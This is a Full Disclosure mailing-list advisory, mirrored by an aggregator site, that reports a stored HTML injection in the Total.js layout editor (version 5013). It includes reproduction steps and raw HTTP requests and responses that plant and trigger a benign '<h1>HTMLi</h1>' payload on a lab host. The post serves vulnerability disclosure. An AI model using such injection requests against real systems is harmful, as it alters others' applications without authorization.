Stored HTML Injection - Layout Functionality - totaljsv5013
Full Disclosuremailing list archivesFrom: Andrey Stoykov <mwebsec () gmail com> 2025-10-29 02:31:35 Author: seclists.org(查看原文) 阅读量:10 收藏
Full Disclosuremailing list archivesFrom: Andrey Stoykov <mwebsec () gmail com> 2025-10-29 02:31:35 Author: seclists.org(查看原文) 阅读量:10 收藏
Full Disclosure mailing list archives
From: Andrey Stoykov <mwebsec () gmail com>
Date: Sun, 26 Oct 2025 17:49:49 +0000
# Exploit Title: Stored HTML Injection - Layout Functionality - totaljsv5013 # Date: 10/2025 # Exploit Author: Andrey Stoykov # Version: 5013 # Tested on: Debian 12 # Blog: https://msecureltd.blogspot.com/2025/10/friday-fun-pentest-series-45-stored.html Stored HTML Injection - Layout Functionality: Steps to Reproduce: 1. Login with user and visit "Layouts" 2. Click on "Create" and enter name for the layout 3. Trap the HTTP POST request and in the "html" parameter value enter the Stored HTML Injection payload below 4. Upon visiting the newly created layout the payload would execute <h1>HTMLi</h1> // HTTP POST Request - Creating New Layout POST /admin/ HTTP/1.1 Host: 192.168.58.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0 [...] {"schema":"layouts_save","data":{"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"}} // HTTP POST Response - Creating New Layout HTTP/1.1 200 OK content-type: application/json; charset=utf-8 cache-control: private, no-cache, no-store, max-age=0 vary: Accept-Encoding, Last-Modified, User-Agent expires: -1 x-powered-by: Total.js Date: Sun, 26 Oct 2025 16:41:53 GMT Connection: keep-alive Keep-Alive: timeout=5 Content-Length: 39 {"success":true,"value":"JE6c9M1cB61f"} // HTTP GET Request - Triggering the Payload POST /admin/ HTTP/1.1 Host: 192.168.58.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:145.0) Gecko/20100101 Firefox/145.0 [...] {"schema":"layouts_html","data":{"id":"JE6c9M1cB61f"}} // HTTP GET Response - Triggering the Payload HTTP/1.1 200 OK content-type: application/json; charset=utf-8 cache-control: private, no-cache, no-store, max-age=0 vary: Accept-Encoding, Last-Modified, User-Agent expires: -1 x-powered-by: Total.js Date: Sun, 26 Oct 2025 16:46:18 GMT Connection: keep-alive Keep-Alive: timeout=5 Content-Length: 60 {"name":"xss-test-layout-name-test","html":"<h1>HTMLi</h1>"} _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/
Current thread:
- Stored HTML Injection - Layout Functionality - totaljsv5013 Andrey Stoykov (Oct 28)
文章来源: https://seclists.org/fulldisclosure/2025/Oct/26
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh